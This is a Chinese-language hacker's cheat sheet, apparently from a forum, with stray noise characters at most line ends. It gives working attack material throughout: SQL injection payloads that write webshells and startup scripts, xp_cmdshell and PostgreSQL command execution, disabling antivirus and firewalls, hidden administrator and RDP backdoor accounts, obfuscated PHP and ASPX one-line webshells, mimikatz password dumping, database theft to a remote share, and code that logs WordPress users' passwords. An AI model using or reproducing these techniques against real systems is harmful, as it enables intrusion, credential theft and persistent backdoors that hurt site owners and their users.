8 ~+ X" l! g3 N! ~, G2 Gcreate table a (cmd text);# y- o* P6 S- v9 v/ j: ^' ?
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
+ ]1 z# Q( }0 w6 Y" Rinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );: Y& K& h/ o9 Q3 i; t" v! X
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );: R1 h( u" t/ A5 n( D
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs"; A' r: w4 \' W: s4 R( J
drop table a;6 d2 `% @9 n( C% r7 ?1 ]
/ b! L3 ?$ o% z& ]8 @1 b( k
英文版本:2 c, P6 |3 |, B
- }( V2 `8 K" k* x! Fuse test;* r; d, g/ `8 H: A& N% O2 O. S
create table a (cmd text);$ C' y& h% {" W' J8 _5 S% W
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
2 j9 X) ?. B6 l& yinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );, ^3 K* i0 h q7 m# I1 u
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );) q( z6 g& z2 z1 T2 e$ r
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
* w% \- F& e. F' ydrop table a;+ e* ]. D8 R5 k6 J- f1 y
( X4 Q* o4 O' g. N) wcreate table a (cmd BLOB);
/ `1 }, V# B7 y( R- pinsert into a values (CONVERT(木马的16进制代码,CHAR));
, @# B; u6 h5 \( u$ N q8 S7 ^select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
6 b+ j% t' O$ C7 _* M7 ], Z$ a. X+ odrop table a;
/ @9 X) K4 @& R
; B# J4 t" B0 A0 C% I记录一下怎么处理变态诺顿
8 q- }3 E, T- W9 b6 R查看诺顿服务的路径 ?5 |# t$ T/ u) z8 B
sc qc ccSetMgr& u( Z; N% q; Z/ S
然后设置权限拒绝访问。做绝一点。。/ O- y, p9 X; }% L1 i) ~
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system/ ] ]: a0 a( Y; c* f
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"; F: L e4 E- ], J
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators; r2 X" [7 F8 Z0 z
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
' A- G- c- C8 J$ N- j
2 X/ D! u- M R2 i) r9 r然后再重启服务器
) h9 g9 o3 y5 g& Q0 [iisreset /reboot& {+ J: }0 Q+ N
这样就搞定了。。不过完事后。记得恢复权限。。。。 r5 p9 ?: P& a. L5 |- _
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F, S% D6 G: Y) U
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
% [6 p* j, E1 }$ o2 X$ h5 N8 Y+ k2 @. V9 Lcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
9 w1 O3 D" Q2 Dcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F2 P0 {3 r: s& ]8 S7 ~/ I, C
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
; q! Y: P* e4 k. c# G' A# i6 V6 |4 B& D+ L
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')" u; d( {) R( E- m/ U0 e( ?- r
3 _' l" I. d. I. c4 }postgresql注射的一些东西
8 X {8 i1 M, r1 f- g& P如何获得webshell; d1 F# v- x# } j2 L6 \, x- w
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
9 F1 P: T; ?1 N; W1 o6 chttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); , v& r# V; d+ R7 B
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;! J& w6 \/ `) V. k5 C% P
如何读文件3 J% ~6 ^! r( V7 G7 Z% g, |
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);+ z7 k& e% e. f+ B- X+ `# g
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
% K& {; P/ }8 V' l t1 `http://127.0.0.1/postgresql.php?id=1;select * from myfile;1 w+ e. G& N! N( m
8 N3 \# ~0 E2 F2 h& d- ]5 S
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。6 R* c. c5 B* x6 S! V. b
当然,这些的postgresql的数据库版本必须大于8.X
, O3 G+ h0 f8 B4 @) v. X2 m3 K- A5 m创建一个system的函数:
/ A" A8 V; C# @& }CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
+ I$ R7 v2 I6 `0 u
& S; C+ o1 E9 F; k0 ?1 w: W' I创建一个输出表:
6 K9 {* s. M$ P* M; M7 a9 E& M3 XCREATE TABLE stdout(id serial, system_out text)7 g. y$ n% f9 a* Q, ~* Z s v+ k
) L3 ?& i. c+ y+ {3 {4 q$ Y; C
执行shell,输出到输出表内:
N0 s' Q; | C: `# {* Q% m- ~' Z9 eSELECT system('uname -a > /tmp/test')
! i5 f2 t( }+ z7 l, Y$ E h! M% n# H
" R1 b5 H; Y' o# Z) r% S5 Tcopy 输出的内容到表里面;; {* X1 u& Z) ~9 I* D
COPY stdout(system_out) FROM '/tmp/test'
! B# u1 B% j C* B; z7 D, ~9 r# I3 r: W5 g. Z1 L! i4 x5 D% D( H
从输出表内读取执行后的回显,判断是否执行成功( K9 |3 X* J4 B% J* `7 p
R$ d- y# c, O: I4 a6 K% e
SELECT system_out FROM stdout
9 r- P" F6 P. h; l d+ D; W下面是测试例子
& F4 Y! K; c8 N6 Y4 T
! r6 ^0 ^6 \( w' W/ _# o/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- - q, V# C8 `3 j0 A% d
$ D0 E" r, f3 k+ s8 x/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C') A0 }9 @2 t5 |& X0 R
STRICT --7 F! _! ^! H6 n% g/ L+ {
' ]" X0 I' T8 k% z4 [
/store.php?id=1; SELECT system('uname -a > /tmp/test') --' H( u$ _' W6 r5 H
6 E. R% H4 _5 h8 s/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --5 J" S2 Z' S9 J& U
: ~$ \2 K" s- D6 J
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--" E/ l s" V% c* M
net stop sharedaccess stop the default firewall- B* a* E0 N) N/ L0 @! O' w
netsh firewall show show/config default firewall
; H- n. L3 r' s: _+ ]netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall; {& u! H; u% w" B, C. y
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall9 _2 D" L* }. A
修改3389端口方法(修改后不易被扫出)
; u$ Z9 u( A( P2 Q d修改服务器端的端口设置,注册表有2个地方需要修改
$ q6 I" o z, _2 r( t1 P) n1 `) C9 g+ w) H; ]. J6 s# @5 N
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
5 }0 E$ F1 h1 d4 V' ~- F# S6 MPortNumber值,默认是3389,修改成所希望的端口,比如6000
& g) R4 B! k% @' C# J1 [& P; ~6 W6 d, V% l- t
第二个地方:
8 l$ @" |0 {) s+ u2 M! _[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
4 z0 e! }0 m$ o$ ~PortNumber值,默认是3389,修改成所希望的端口,比如6000
. Y0 v$ }' a4 [/ I. [( f
' W- j! h/ Y$ H现在这样就可以了。重启系统就可以了1 y( T" ]/ f7 m" V& s1 |# B8 h4 L! G
: e) P9 y' P( H m+ C9 T$ C( p8 f
查看3389远程登录的脚本
: A. ~( e, U- |# L6 m保存为一个bat文件: _$ C+ ^& H3 ]! l0 R
date /t >>D:\sec\TSlog\ts.log# y5 Z, n# e( r& } m D
time /t >>D:\sec\TSlog\ts.log% Q+ X( E+ F- }3 ~/ {4 ?
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
" q$ I" u) F1 |0 gstart Explorer$ ?" D; g* ^: L5 b0 ^' V+ s6 r; `
7 j" z4 `, I& l& g1 cmstsc的参数:
* K% `8 M" u( W6 P
) M' G1 m2 z9 {/ E远程桌面连接
) ?$ b p- `4 l$ h* l: D- \: w
& \' T+ w) ~# k$ K3 @- aMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
) e; j( {* P* p( O0 Y [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
+ F, I& M+ m2 @9 S9 [# f/ F3 s1 p( ?# z1 [$ b
<Connection File> -- 指定连接的 .rdp 文件的名称。5 J+ i/ _" }; L2 b/ p' @- a( p
7 n* w) z2 v8 v0 h2 y- y% ^+ T, M/v:<server[:port]> -- 指定要连接到的终端服务器。
0 @6 c1 Q/ V. h/ ]2 w* T: Q3 y9 p3 K; f( D5 h Q9 B
/console -- 连接到服务器的控制台会话。5 c- k+ X4 ]2 f8 F
! K) {8 @7 v5 X) w$ _
/f -- 以全屏模式启动客户端。$ F( j! B- @* o+ A' J
! W/ L; u. f: W# o4 t/w:<width> -- 指定远程桌面屏幕的宽度。
; H! B+ g3 }1 D# B0 U8 B3 k9 M# U8 Y' I( W* Z& \" M* i+ c: j n) k
/h:<height> -- 指定远程桌面屏幕的高度。6 ]9 V" Y, b, l, R1 P! I
+ k' y7 a. U/ g
/edit -- 打开指定的 .rdp 文件来编辑。1 k6 z0 ?% u; |: g, N
* K6 F& H) `1 c+ `: {3 B
/migrate -- 将客户端连接管理器创建的旧版
! R; O2 v" h2 c, ?/ J, M连接文件迁移到新的 .rdp 连接文件。2 a6 k+ N2 @9 A
& D" d$ \1 s1 m4 c4 p9 m ?: t) }6 j3 S$ ^) {9 [3 B
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
9 R& W. h' E7 P0 e! W ^8 O# P4 mmstsc /console /v:124.42.126.xxx 突破终端访问限制数量
+ C" ?! g* C! W- \
! m2 {) W) ]- }0 g命令行下开启3389
( s' Z6 h; l9 V0 t' E# V3 m2 p9 Onet user asp.net aspnet /add
( c$ c9 l" _3 S% Cnet localgroup Administrators asp.net /add
* m, w+ j9 ? C* mnet localgroup "Remote Desktop Users" asp.net /add! |9 T3 ]7 D% n- A
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
3 J) h4 H: N5 Q) }; \! E9 b6 d$ ?echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0& l% i7 ~( R, b1 u* H( q. S
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
9 X, U' @0 ^2 F1 x$ W/ V" gecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f6 p& z, m" J6 N& k7 x
sc config rasman start= auto4 [. s3 N1 @! _6 q5 C
sc config remoteaccess start= auto0 }/ l* ]- k* P
net start rasman
+ E; D- M# {" G6 F. O9 ~net start remoteaccess- q/ V1 C& y# g% }
Media2 }( P6 @6 b0 u& P/ A9 o
<form id="frmUpload" enctype="multipart/form-data"9 }7 V) W# H& ]3 b
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
) }( w7 h& M" R M) a. p<input type="file" name="NewFile" size="50"><br>
' L: K) n/ D; j5 i<input id="btnUpload" type="submit" value="Upload">
) @" u; x- J5 i- `</form>2 Z- \: A- A1 S. f
+ Y1 k s1 k/ O* @* M
control userpasswords2 查看用户的密码
8 S8 A8 c8 [, ?1 waccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
( y- p& P* }& m: g' w; K1 t2 fSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a7 B! G1 T9 K* J( |7 \7 S4 g: G$ d
# o3 e6 Y+ j, R& W9 C% B141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
) C- A7 P' `$ C/ f测试1:
' D1 {3 M' h0 q# q" i3 ?( QSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1) N* ]* q) m6 t4 `/ [# x
2 W# D$ D! B9 Z2 q/ A3 V测试2:, K3 U% M8 p G6 Y
/ E; I( o9 I! _3 L1 mcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
' d) |) R0 \$ K, g" r3 N3 O& h* A* Y4 ]2 U: _! e
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
1 J* j# y4 Z$ |( @8 @3 N7 g- R9 J# `$ `9 N0 [1 z. N* H$ W$ D m
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
* p7 z6 |1 R) C: [关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
+ `9 o% j8 T3 S可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;% |, f/ g/ Q/ o" K1 u5 \# M8 V+ B
net stop mcafeeframework( z* p* {" q& U: g& j/ \9 I& I
net stop mcshield; K3 A% m1 ~8 T, l
net stop mcafeeengineservice
4 ~* f0 `% X0 N! ~! m$ r" s3 X9 vnet stop mctaskmanager0 l) [, Y: T$ Z
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
5 l. n4 b/ N* [' s/ v. X
$ B3 n" X1 y: l d1 i- [8 f VNCDump.zip (4.76 KB, 下载次数: 1)
& M/ Q9 |0 U% U密码在线破解http://tools88.com/safe/vnc.php8 t) z3 Y$ J4 O, r2 a Z2 l0 i
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
6 M' B* P+ I; Y* f1 ? j4 b& J& l, t) C7 h+ f' D( d
exec master..xp_cmdshell 'net user': @ ^8 ^0 d* G3 {
mssql执行命令。
, D& n$ [6 t/ F* Q( T* S+ U获取mssql的密码hash查询
5 {6 y) Q2 O6 V1 a& ^% oselect name,password from master.dbo.sysxlogins8 E3 |6 z$ x' n" r z4 Y
& Z6 n' [# b2 ?1 Ybackup log dbName with NO_LOG; ^0 u0 G1 C- a5 ?7 s; Q
backup log dbName with TRUNCATE_ONLY;' Q3 x6 C- \, f7 S/ [ w# g
DBCC SHRINKDATABASE(dbName);& f }: i% D6 M e* [2 {
mssql数据库压缩
- }7 K3 f& B' u* [) l! u% \5 y4 m: P: R7 P9 Q( P6 T- b+ d: d
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK' e9 `- a" Y, U7 s# Z: d( U: f
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。" }/ M f2 Z# q
+ [+ X1 `0 }/ V; G; L
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
r% B2 W3 i( W/ I2 r) f( J& r备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
7 R' f7 k$ ~. B3 ]3 E+ b2 V G% r9 p7 [) q7 B* f
Discuz!nt35渗透要点:
" v! n+ E$ l* n+ q" b, g: ~(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default7 Z6 G( O$ c: C0 ~. l
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
6 ]- U4 R( Q! _. l; j, x0 b, k! `(3)保存。$ I1 M" z" L& [- m+ P9 D9 x
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
7 |$ M6 w2 w- i D$ Md:\rar.exe a -r d:\1.rar d:\website\$ ^- W0 W7 K$ i3 \) V: k( s
递归压缩website
% w2 E z! u1 Y3 |# Q注意rar.exe的路径* C( V' U9 f3 l+ k
; \1 f! F( x' t( y) k ~/ E4 I<?php
+ c8 b- B+ X1 |+ [9 s$ ~. B$ u. [. ]8 v9 o* _) Y
$telok = "0${@eval($_POST[xxoo])}";
& N, L7 u9 z) }% s
9 ?; c- F/ E1 s# B3 e2 }$username = "123456";
4 r* A& L/ @' t% a+ l* w' d; A( B7 |0 A( v
$userpwd = "123456";
4 @4 s+ x' T, L( B, v( K7 e8 e) C' x( a; U. w4 c1 \' _2 D
$telhao = "123456";
& W, ~3 M' Y9 B$ Q
+ W0 }$ ^: K8 i- `" u. [$telinfo = "123456";
. S$ `& [1 @ }! w3 G5 T; c# Q7 J5 W/ I$ ]- \( v
?>& S0 G" ~" Y2 h1 o+ L
php一句话未过滤插入一句话木马
( h. H& q8 L' m7 h3 I* r8 K( F5 v' E* x7 T
站库分离脱裤技巧
; U" G4 d. x h9 q$ @" ~exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'- ^2 n9 f; p9 G! O# `
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'- c+ p5 |% e$ C4 Q! p
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。) t$ e8 b7 g$ V5 k& N T2 B8 k% r
这儿利用的是马儿的专家模式(自己写代码)。
, ? T: P0 b% z; U3 G1 bini_set('display_errors', 1);1 ]5 k( U6 a8 }7 s3 m
set_time_limit(0);
2 A0 m$ m2 v) z ^9 p/ ?5 aerror_reporting(E_ALL);7 H- A5 S. l6 h& r$ x9 v( a6 Q
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
7 u; A+ T+ u6 D9 c$ d X3 e+ s" A, ymysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
/ s4 p# J$ M9 F9 s! H, @' {$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());# a1 O0 W1 }4 i5 d
$i = 0;
9 B: s0 B5 Y6 g: U8 \$tmp = '';+ _7 P# }: `! r/ K% G; L6 o
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
3 L W, |" M' H( r/ | $i = $i+1;
6 G a3 S( v9 m9 S; h $tmp .= implode("::", $row)."\n";
# u7 t4 i0 v. i. b: t if(!($i%500)){//500条写入一个文件
4 W Z* B& k+ R5 b$ n $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
+ d7 U0 V4 F; Z% X1 @' w% q file_put_contents($filename,$tmp);
2 D% ^* F$ W3 R5 ^9 }! ^ $tmp = '';: A# o" C, x1 T: b4 x* x$ W+ ?
}- r9 K5 g8 i! d" @; X- P u- i
}6 Y7 z/ M6 A# v* i( T: X% V1 ]
mysql_free_result($result);
& y$ Y( I7 J8 K9 d3 s( W% v6 h/ {8 C6 L( [
4 y/ S! o, m: Z( F( a
0 }& R1 g8 H% W6 |//down完后delete% W: i7 F* L0 w; k# ]
9 @% l1 u& d* C$ y4 d8 O; C" U3 Q+ @+ Z* O( w3 m# ^
ini_set('display_errors', 1); [5 t" \% r( N0 h# w% P+ t
error_reporting(E_ALL);7 J" s3 M- J9 m( A
$i = 0;
) y: g* B4 Y) C; {while($i<32) {
* w. t6 X" h! F/ j" W. G $i = $i+1;/ W( c; Q. [ C$ C$ H& }! t1 Z8 p
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';' [2 K' G/ E+ j3 ]$ @
unlink($filename);
c7 W; M; d* y, U% a. ~/ q} # @& v3 V+ K6 M' e
httprint 收集操作系统指纹
! m! x* t4 z5 h9 }! Z4 \扫描192.168.1.100的所有端口
7 f3 x9 P5 j7 i6 n% a9 o2 h) x7 \' w$ snmap –PN –sT –sV –p0-65535 192.168.1.100
* {$ Z I- N0 p% t1 n3 w# w0 Ehost -t ns www.owasp.org 识别的名称服务器,获取dns信息
3 X1 {- }* ~ u- `' z- qhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输: K- [1 Q/ I$ V
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host! d+ W b& P- v0 q2 p0 s
; g8 K. {/ J7 u& F# \* E
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
1 z) E& s4 k, B$ g
5 i- u2 m6 w5 M* X3 o MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)& D9 H- H# s6 `7 x
2 h/ [/ }2 I7 u Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x' q9 M0 z+ ?+ T) C9 m+ n
3 H! c3 v# d; e1 r DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
1 w! m+ B: B" v3 o6 P4 p; ?. r7 B
http://net-square.com/msnpawn/index.shtml (要求安装)* }* ?0 Q: n$ N7 ^
4 C2 g" H! t5 G+ U! Q tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)# I' B1 p$ |. D( G
2 u3 z8 k4 o f \4 T- U/ e' t3 r
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找). P2 q; q/ b5 N; ?- a7 w6 r
set names gb2312! s. J* l0 N- O3 s; `
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
$ n% k& ], {5 j8 e
8 }& X4 G+ D4 w" J6 W% Fmysql 密码修改# O% h( v- V! r. \2 W5 O
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
6 S0 `0 S! T% L) o g6 @update user set password=PASSWORD('antian365.com') where user='root';9 a# \5 ~) G: e8 }. h2 C7 Z2 P
flush privileges;
* ]& S6 M( M7 B- B. S8 O% W高级的PHP一句话木马后门
- X. ~* u1 E( {* N6 O& y
9 u# G* V1 @! w1 D5 @, i1 X入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
8 @0 n- H2 f' I" k$ f! ?, q- \ R7 k1 B6 O, ^5 f
1、
) o) Y$ ?2 e" ~; M) N" P2 h! Q8 Y! p) [0 Y( Q# a0 X# A
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";+ m: d7 q4 [/ @6 g( u# ^: O. [
$ h0 A5 j7 K* h; C; j$hh("/[discuz]/e",$_POST['h'],"Access");' u t: [' K$ M/ E. V h7 n
# `' _3 w+ ?" A. H$ j! v' p//菜刀一句话+ K% P4 |1 U8 Z9 ~7 k6 P: ~
; C$ K) r, }. D$ H) |2、
9 q8 \8 X" A- L! s( s& }5 n G$ y/ s* {3 n5 Y* p$ D* t" y4 s; X
$filename=$_GET['xbid'];: m7 k7 }7 [) W! w8 R$ v3 {
8 w" J: {6 s. Y. W; e
include ($filename);* t; D) k5 i) T* ]/ W$ B) _
. T d# n5 C: J- M//危险的include函数,直接编译任何文件为php格式运行: p) k0 e/ L ?) `" e- y
6 h( k: @6 _0 ^8 ?9 Y# q
3、; A7 D$ {3 f1 W( m' e
8 z0 s" ?* x. {% @
$reg="c"."o"."p"."y";
1 x% M/ i* ^$ M
h; C" g- h1 u* X# q" p5 R$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);" Y: v1 Y1 D) Z1 v
& W0 W' R7 l% m) {- P7 o: A//重命名任何文件. w1 Q8 f0 R$ B: U& O
( Z `7 m) c0 m3 \
4、9 I5 O+ O. V! c5 t x5 |
" u/ N" F; C" E$ A- X# l$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
/ o c* Y" k3 o* T' K+ V. `- i7 i5 S2 w) Q; T- [( I! R2 ~. o. Y
$gzid("/[discuz]/e",$_POST['h'],"Access");: N0 S4 h' l& D$ i
3 c9 ^1 \! v3 S( U" } W; v//菜刀一句话
u$ ~4 y/ f3 N' {$ G/ B/ N I7 F. u5 a
5、include ($uid);# Y; b4 h3 R/ v+ T# k, j
( p( U7 i! t3 r& _
//危险的include函数,直接编译任何文件为php格式运行,POST , b* [; B- }+ x! C- G, `
: o" X& _8 F- a/ j8 z" {; o5 C( h. |
//gif插一句话' X5 H/ o: l2 N& c
/ r- z3 T* ^, n% ?) Q
6、典型一句话
, _- F' b$ a0 G* C" `3 E( w
O- X5 X0 D0 g( D程序后门代码
) s9 i% A9 ]6 F, g<?php eval_r($_POST[sb])?>; V2 S9 d6 }& D) O" Q$ B& K* `2 m# a/ L
程序代码' g4 s" ^. x* I
<?php @eval_r($_POST[sb])?>* z- G& U6 Z; R, _5 i' d; x: |% k
//容错代码5 g0 u2 {. {3 y9 ~$ o5 F
程序代码. M6 @- S! o7 d! A) B ?1 V$ i
<?php assert($_POST[sb]);?>6 W$ d. g8 i$ ^ ?
//使用lanker一句话客户端的专家模式执行相关的php语句
5 i+ H3 ]0 {0 |: ?% g9 C程序代码* }! M3 Q5 D- Y3 P9 F6 r0 v
<?$_POST['sa']($_POST['sb']);?>
6 Z6 w, S" [5 o% d1 [2 l程序代码
/ r1 U3 u8 u& p7 \. V* B<?$_POST['sa']($_POST['sb'],$_POST['sc'])?> f1 T; G9 t7 J
程序代码& n# I6 z# |; U0 N1 }. T# K
<?php
7 s( g5 d$ |0 K; U& D, `@preg_replace("/[email]/e",$_POST['h'],"error");
7 Q+ R. |1 M: d9 Z7 O( m?>
6 c' ^; q+ i6 u7 Z! q7 d3 v//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入* ]7 z: q7 X2 [0 s% A0 d
程序代码7 Y% n( p0 d6 E, t" q/ k+ d! K
<O>h=@eval_r($_POST[c]);</O>. c4 E0 q" L% r+ B1 D' v$ o7 w
程序代码
( U9 A5 j( L2 ^7 d3 }- m<script language="php">@eval_r($_POST[sb])</script>
& }- j) l/ t% V" x" S$ c4 [//绕过<?限制的一句话
4 |9 m: X- i/ \2 r! i+ c
) C$ D8 o' R) p" P# Ghttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip3 r+ M0 U7 b; @" J6 ?
详细用法:6 K. m5 R, w C6 P* y3 a
1、到tools目录。psexec \\127.0.0.1 cmd
0 M$ }' u, s) h4 G2、执行mimikatz
p- f, y; V& |% b2 e3、执行 privilege::debug, M9 v; K6 q; Z3 U
4、执行 inject::process lsass.exe sekurlsa.dll$ E/ a- a! \2 e
5、执行@getLogonPasswords0 e: e5 v; r5 s8 ^$ H( s
6、widget就是密码% } S7 r' Z8 o8 J1 s7 a8 U& O% e
7、exit退出,不要直接关闭否则系统会崩溃。
9 U& {! ^" e3 O! @; F# z1 F, `1 b
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面& }8 H: V& z# J' [% U8 C
( ?4 |3 ^0 O" i, V/ v# ~( [! H. }
自动查找系统高危补丁/ m, p# x0 \. i7 @/ }& _
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt. C8 C/ Q/ C6 Q
2 o- T: D$ A4 J- q2 j突破安全狗的一句话aspx后门! [; f: c1 \# a9 ^
<%@ Page Language="C#" ValidateRequest="false" %>, c, h& W( I4 W
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
* z* B- g, N: _0 x4 z* E3 T/ Wwebshell下记录WordPress登陆密码. r3 i9 O5 W: U0 |+ ]
webshell下记录Wordpress登陆密码方便进一步社工" w9 L5 _* M0 k* H9 i
在文件wp-login.php中539行处添加:
. M2 {# n. R E3 S1 \" z# l// log password" Q( R4 [: ]0 B, t- \( [/ G0 `
$log_user=$_POST['log'];
! N- o9 c) T! L M7 R$log_pwd=$_POST['pwd'];
' o6 N4 [3 q6 ^9 s! B m$log_ip=$_SERVER["REMOTE_ADDR"];
3 L6 Z; b0 d" K+ c+ K9 n$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;" M0 K/ |9 @" o; _& z3 _5 W, c* O. z
$txt=$txt.”\r\n”;
, P! Z7 X0 C- {# fif($log_user&&$log_pwd&&$log_ip){+ j: S; \( V/ B5 i
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
3 f5 t- _) K2 R}
5 d) I, I1 O" l& ~0 p }! u: x) h7 J7 |当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。: a6 I. Q) a0 ?2 f% {
就是搜索case ‘login’2 ^. K3 A) n& b2 F& O$ ?1 d
在它下面直接插入即可,记录的密码生成在pwd.txt中,# L6 u! g; E5 L" R# U
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
